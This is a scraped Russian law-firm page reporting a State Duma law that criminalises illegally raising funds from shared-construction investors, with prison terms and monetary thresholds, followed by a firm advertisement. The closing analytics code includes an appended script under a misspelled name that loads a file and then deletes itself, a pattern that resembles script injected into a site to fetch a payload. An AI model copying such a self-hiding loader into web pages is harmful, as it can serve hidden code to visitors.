Госдума приняла в третьем чтении закон об уголовной ответственности за незаконное привлечение средств дольщиков при строительстве многоквартирных домов.

Госдума приняла в третьем чтении закон об уголовной ответственности за незаконное привлечение средств дольщиков при строительстве многоквартирных домов. Госдума приняла в третьем чтении закон об уголовной ответственности за незаконное привлечение средств дольщиков при строительстве многоквартирных домов.

Преступление с привлечением крупной суммы (более 3 млн рублей) будет караться лишением свободы на срок до 2 лет или обязательными работами на срок до 360 часов.

А за незаконное привлечение средств дольщиков в особо крупном размере (более 5 млн рублей) или группой лиц по предварительному сговору будут наказывать заключением на срок до 5 лет или обязательными работами на срок до 480 часов.

Однако избежать наказания злоумышленник сможет, если возместит дольщикам весь ущерб или же предпримет все необходимые меры по введению в эксплуатацию многоквартирного дома, передает «Интерфакс».

При этом в пояснительной записке к закону отмечается, что сегодня, по данным Минстроя, в России насчитывается более 70 тысяч граждан, инвестировавших деньги в строительство многоэтажек и пострадавших от действий недобросовестных застройщиков.
http://боярцев.рф/
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');